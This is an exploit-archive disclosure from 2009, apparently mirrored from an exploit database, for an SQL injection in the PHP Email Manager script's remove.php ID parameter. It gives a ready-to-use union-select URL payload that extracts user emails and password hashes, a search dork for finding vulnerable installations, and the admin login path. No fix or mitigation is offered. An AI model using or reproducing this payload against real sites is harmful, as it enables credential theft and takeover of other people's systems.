[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP Email Manager (remove.php ID) SQL Injection Vulnerability
# Published : 2009-08-18
# Author : MuShTaQ
# Previous Title : In-Portal 4.3.1 (index.php env) Local File Inclusion Vulnerability
# Next Title : CBAuthority - ClickBank Affiliate Management SQL Injection Vulnerability
===========================================|->
~ Mtrb3 hena [Security-Code] ~
===========================================|->
script :-> PHP Email Manager < Remote SQL Injection Vulnerability >
Downlode:->http://webscripts.softpedia.com/script/Mailing-List-Managers/PHP-eMail-Manager-30652.html
Dork:->PHPEmailManager
Found by :-> [ MuShTaQ ]
from :-> [WwW.SeC-CoDe.com]
C0ntact :a7m@mail.com
===========================================|->
~ Exploit ~
===========================================|->
File :-> http//www.site.com/PHPEmailManager/remove.php?ID=[SQL]
Exploit:-> http://www.site.com/PHPEmailManager/remove.php?ID=-1+union+select+1,concat%28Email,0x3a,PasswordHash%29,3,4,5,6,7,8,9,10,11+from+php_email_man_Users--
Admin Login:-> http//www.site.com/PHPEmailManager/login.php
-:::::::::::::::::: GreeetZ:::::::::::::::::-
Sniper.vb , Mr.Nrfzh,and all friends
Bay Bay
# www.Syue.com [2009-08-18]